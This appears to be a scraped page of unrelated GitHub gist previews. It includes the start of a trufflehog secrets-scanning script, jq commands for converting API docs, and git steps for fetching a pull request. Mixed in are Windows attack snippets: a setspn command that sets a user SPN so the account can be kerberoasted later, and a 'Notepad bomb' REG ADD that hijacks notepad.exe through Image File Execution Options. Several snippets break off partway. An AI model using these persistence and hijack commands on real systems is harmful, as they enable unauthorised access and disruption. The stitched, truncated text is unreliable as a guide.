iknowjason

# Secrets scanning at scale:  3 different tools

# trufflehog
#!/bin/bash
# 1. get all repos: gh repo list <organization> --limit 1000 > repos.txt
# 2. parse repos.txt so each line looks similar to: https://github.com/username/repo-name.git

# Remotely scan the repos using trufflehog without downloading
while IFS= read -r repo
do

vestjoe

Misc persistence techniques

Set User SPN for future kerberoast attacks

Set a SPN on a user account to provide to regain password to account that was changed.

Example

setspn -S MSSQLSvc/myhost.redmond.microsoft.com:1433 redmond\accountname  

vestjoe

Image File Execution Options - DOS

Notepad bomb

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /t REG_SZ /v Debugger /d "cmd.exe /c echo Come at me bro... && start C:\windows\notepad.exe&" /f

Explorer Bomb

jkrasnay

# Convert to TSV
# Note -r flag
# to_entries creates an array of key,value maps, the trailing [] converts this array to stream items
cat api-docs.json | jq -r '.paths | to_entries[] | .key as $path | .value | to_entries[] | [.key,$path,.value.tags[0]] | @tsv'

# Transform into different JSON...
cat api-docs.json | jq '[ .paths | to_entries[] | .key as $path | .value | to_entries[] | { path:$path, method:.key, tag:.value.tags[0] } ]'

adam-p

It's not immediately obvious how to pull down the code for a PR and test it locally. But it's pretty easy. (This assumes you have a remote for the main repo named upstream.)

Getting the PR code

1. Make note of the PR number. For example, Rod's latest is PR #37: Psiphon-Labs/psiphon-tunnel-core#37

2. Fetch the PR's pseudo-branch (or bookmark or rev pointer whatever the word is), and give it a local branch name. Here we'll name it pr37:

$ git fetch upstream pull/37/head:pr37